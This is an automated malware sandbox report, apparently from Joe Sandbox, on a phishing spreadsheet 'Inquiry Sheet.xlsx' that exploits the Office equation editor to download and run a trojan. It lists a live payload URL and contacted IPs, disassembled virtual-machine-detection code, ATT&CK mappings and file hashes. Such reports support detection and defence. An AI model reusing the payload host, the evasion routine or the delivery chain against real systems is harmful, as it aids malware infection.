File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\Public\vbc.exe

RDTSC instruction interceptor: First address: 0000000000329831 second address: 0000000000329831 instructions: 0x00000000 rdtsc 0x00000002 mov eax, FCDACE93h 0x00000007 sub eax, 1A63DDA3h 0x0000000c xor eax, D5EBB4F5h 0x00000011 add eax, C862BBFCh 0x00000016 cpuid 0x00000018 jmp 00007F22F08EB422h 0x0000001a pushad 0x0000001b mov dx, C148h 0x0000001f cmp dx, C148h 0x00000024 jne 00007F22F08EA77Dh 0x0000002a popad 0x0000002b popad 0x0000002c call 00007F22F08EB3E8h 0x00000031 lfence 0x00000034 mov edx, CD724B6Dh 0x00000039 xor edx, AC8852AFh 0x0000003f xor edx, A3550569h 0x00000045 xor edx, BD511CBFh 0x0000004b mov edx, dword ptr [edx] 0x0000004d lfence 0x00000050 test edx, eax 0x00000052 cmp eax, edx 0x00000054 test eax, ecx 0x00000056 ret 0x00000057 sub edx, esi 0x00000059 ret 0x0000005a add edi, edx 0x0000005c dec dword ptr [ebp+000000F8h] 0x00000062 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000069 jne 00007F22F08EB3C9h 0x0000006b test dl, FFFFFFE1h 0x0000006e call 00007F22F08EB42Bh 0x00000073 call 00007F22F08EB45Ch 0x00000078 lfence 0x0000007b mov edx, CD724B6Dh 0x00000080 xor edx, AC8852AFh 0x00000086 xor edx, A3550569h 0x0000008c xor edx, BD511CBFh 0x00000092 mov edx, dword ptr [edx] 0x00000094 lfence 0x00000097 test edx, eax 0x00000099 cmp eax, edx 0x0000009b test eax, ecx 0x0000009d ret 0x0000009e mov esi, edx 0x000000a0 pushad 0x000000a1 rdtsc

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2832

Thread sleep time: -300000s >= -30000s

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 6_2_00329829 rdtsc

6_2_00329829

Source: C:\Users\Public\vbc.exe

Code function: 6_2_00329829 rdtsc

6_2_00329829

Source: C:\Users\Public\vbc.exe	Code function: 6_2_00328C25 mov eax, dword ptr fs:[00000030h]	6_2_00328C25
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0032441B mov eax, dword ptr fs:[00000030h]	6_2_0032441B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00326503 mov eax, dword ptr fs:[00000030h]	6_2_00326503
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0032A24C mov eax, dword ptr fs:[00000030h]	6_2_0032A24C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003292EB mov eax, dword ptr fs:[00000030h]	6_2_003292EB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0032A2D7 mov eax, dword ptr fs:[00000030h]	6_2_0032A2D7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003237A0 mov eax, dword ptr fs:[00000030h]	6_2_003237A0

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'

Jump to behavior

Source: vbc.exe, 00000006.00000002.678140979.00000000008C0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.678140979.00000000008C0000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: vbc.exe, 00000006.00000002.678140979.00000000008C0000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Exploitation for Client Execution12	Path Interception	Process Injection12	Masquerading111	OS Credential Dumping	Security Software Discovery21	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Extra Window Memory Injection1	Virtualization/Sandbox Evasion1	LSASS Memory	Virtualization/Sandbox Evasion1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol121	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Extra Window Memory Injection1	Cached Domain Credentials	System Information Discovery12	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Inquiry Sheet.xlsx	27%	ReversingLabs	Document-OLE.Exploit.CVE-2017-11882

Dropped Files

Source	Detection	Scanner	Label
C:\Users\Public\vbc.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	18%	ReversingLabs	Win32.Trojan.Mucc
C:\Users\Public\vbc.exe	18%	ReversingLabs	Win32.Trojan.Mucc

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://212.192.246.25/excel/vbc.exe	100%	Avira URL Cloud	malware
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://37.0.11.217/WEALTHYREM_ecI	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://212.192.246.25/excel/vbc.exe	true	Avira URL Cloud: malware	unknown
http://37.0.11.217/WEALTHYREM_ecI	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	vbc.exe, 00000006.00000002.678573420.0000000003407000.00000002.00020000.sdmp	false		high
http://www.windows.com/pctv.	vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp	false		high
http://investor.msn.com	vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp	false		high
http://www.icra.org/vocabulary/.	vbc.exe, 00000006.00000002.678573420.0000000003407000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	vbc.exe, 00000006.00000002.678573420.0000000003407000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.hotmail.com/oe	vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp	false		high
http://www.day.com/dam/1.0	BEC4B86A.emf.0.dr	false		high
http://investor.msn.com/	vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
212.192.246.25	unknown	Russian Federation		205220	RHC-HOSTINGGB	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	482488
Start date:	13.09.2021
Start time:	20:15:41
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Inquiry Sheet.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	2
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSX@4/27@0/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 31.4% (good quality ratio 22.3%) Quality average: 46.5% Quality standard deviation: 35.9%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, WMIADAP.exe, svchost.exe Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtQueryAttributesFile calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/482488/sample/Inquiry Sheet.xlsx

Simulations

Behavior and APIs

Time	Type	Description
20:16:41	API Interceptor	34x Sleep call for process: EQNEDT32.EXE modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
RHC-HOSTINGGB	01_extracted.exe	Get hash	malicious	Browse	212.192.246.191
	CHECKLIST INQ 1119.vbs	Get hash	malicious	Browse	212.192.246.191
	DOCU_SIGN8289292930001028839.PDF.exe	Get hash	malicious	Browse	212.192.246.165
	DOCU_SIGN8289292930001028838.PDF.exe	Get hash	malicious	Browse	212.192.246.165
	DOCU_SIGN8289292930001028838.PDF.exe	Get hash	malicious	Browse	212.192.246.165
	DOCU_SIGN8289292930001028838.PDF.exe	Get hash	malicious	Browse	212.192.246.165
	DOCU_SIGN8289292930001028838.PDF.exe	Get hash	malicious	Browse	212.192.246.165
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	Browse	212.192.246.176
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	Browse	212.192.246.176
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	Browse	212.192.246.176
	53t6VeSUO5.exe	Get hash	malicious	Browse	212.192.246.56
	1p34FDbhjW.exe	Get hash	malicious	Browse	212.192.246.176
	eli.exe	Get hash	malicious	Browse	212.192.246.242
	eli.exe	Get hash	malicious	Browse	212.192.246.242
	rfq-aug-09451.exe	Get hash	malicious	Browse	212.192.246.250
	Nd1eFNdNeE.exe	Get hash	malicious	Browse	212.192.246.73
	J5U0QK6IhH.exe	Get hash	malicious	Browse	212.192.246.147
	RF 2001466081776.doc	Get hash	malicious	Browse	212.192.246.147
	HalkbankEkstre1608219773667200308882717534.ex.exe	Get hash	malicious	Browse	212.192.246.93
	Inquiry.exe	Get hash	malicious	Browse	212.192.246.179

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	139264
Entropy (8bit):	6.609176626733107
Encrypted:	false
SSDEEP:	1536:T8hQbCg3d/xOfo6dUoEiL7yQMLIn6Otq/CrAvI7S6mStD2arf6FRo6DomgJ:DGAZ6dNEc/MLo6Ot57S69D2aD6F5oj
MD5:	B7E5ACDADE5630DBF1AB4B211DDC16DB
SHA1:	EF39B9D9B31F61A538C79D06171B2F3FB62D3346
SHA-256:	F16CD8C15E34505A4C72C77DF972264F67E97C2E0B79B205F82BB59F26C09998
SHA-512:	61FA3478A69E18BF8024E656AB3C7334B96C94BA8A64E672596D77FE84F5E247508E13331DBE10D20488EDAEA7E0D976D8E5C1B27820AB4091F063E7833E05B9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 18%
Reputation:	low
IE Cache URL:	http://212.192.246.25/excel/vbc.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6..W..W..W..K..W..u..W..q..W.Rich.W.........................PE..L.....kH..........................................@..........................`......\b..........................................(.... ..:;..................................................................8... ....................................text............................... ..`.data...XE..........................@....rsrc...:;... ...@..................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\13D19963.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	7788
Entropy (8bit):	5.5366022587072345
Encrypted:	false
SSDEEP:	96:w0CblJaXn/08zDefAm/luoOHo6MiDbDda91RjTBbPxmPAWmOHX:wZTNAK4oOIGbK1RvVwPAWmOHX
MD5:	F1E1ADDCD68163BF90F6BB1F51FBFEDF
SHA1:	CDACDEC4E8E0EC2B60CB37585D156859AB6E6BD6
SHA-256:	9BB4C7D9F2BECCEBD243C456185A0EE660A10248B91BDE9BAB8D8E9C5F7E66A6
SHA-512:	CA37D803639C2DA62E113A6984E0A157094E51710A0302931F71A4A4B3DAFC1FB8786CCB86F2F0B7A156E1032BE49D7D5FCDE3B3CAD5A670A37376DB9A361AE1
Malicious:	false
Reputation:	low
Preview:	....l...).......u...<.........../....... EMF....l...........................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I...................................................#.6.).X.......d.............................p....\...............\.....p........<5.u..p....`.p..#.$y.w.h&................w..&.$.......d............^.p.....^.p.\&..h&.H4......-...D....<.w................<.9u.Z.v....X.n......#........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD?^KHCcNJFfOJFiQMHlSPJoUPLrWRMvYSPx[UR{]XQ~^XS._ZT.a[U.c\U.e^V.e^X.g`Y.hbY.jaZ.jb\.ld].ld].nd^.nf^.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1C86035F.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	49744
Entropy (8bit):	7.99056926749243
Encrypted:	true
SSDEEP:	768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
MD5:	63A6CB15B2B8ECD64F1158F5C8FBDCC8
SHA1:	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
SHA-256:	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
SHA-512:	BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..\|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$.......kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........\|i ..."....V.g.\.G..p..p.X[.....%hyt...@..J...~.p.....\|..>...~.`..E_....iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w..y..\|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.\|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2C6D05D4.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6815
Entropy (8bit):	7.871668067811304
Encrypted:	false
SSDEEP:	96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
MD5:	E2267BEF7933F02C009EAEFC464EB83D
SHA1:	ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
SHA-256:	BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
SHA-512:	AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.\|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...\|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...\|.RiNY.+.b...E.W.8^..o....;'..\.}........\|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3469E5BD.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	33795
Entropy (8bit):	7.909466841535462
Encrypted:	false
SSDEEP:	768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
MD5:	613C306C3CC7C3367595D71BEECD5DE4
SHA1:	CB5E280A2B1F4F1650040842BACC9D3DF916275E
SHA-256:	A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
SHA-512:	FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."(.G.L.{'?..z.w.93..".........~....06\|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.\|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{...=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f\|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\39CC72E1.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
Category:	dropped
Size (bytes):	8815
Entropy (8bit):	7.944898651451431
Encrypted:	false
SSDEEP:	192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
MD5:	F06432656347B7042C803FE58F4043E1
SHA1:	4BD52B10B24EADECA4B227969170C1D06626A639
SHA-256:	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
SHA-512:	358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T..K..\|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3A88E756.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
Category:	dropped
Size (bytes):	14198
Entropy (8bit):	7.916688725116637
Encrypted:	false
SSDEEP:	384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
MD5:	E8FC908D33C78AAAD1D06E865FC9F9B0
SHA1:	72CA86D260330FC32246D28349C07933E427065D
SHA-256:	7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
SHA-512:	A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
Malicious:	false
Preview:	......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...\|5.2.....%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......\|j.4.mn..Ke!G.6PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.\|..10........... ..l..\|F...E9...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\438FC3C5.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	33795
Entropy (8bit):	7.909466841535462
Encrypted:	false
SSDEEP:	768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
MD5:	613C306C3CC7C3367595D71BEECD5DE4
SHA1:	CB5E280A2B1F4F1650040842BACC9D3DF916275E
SHA-256:	A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
SHA-512:	FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
Malicious:	false
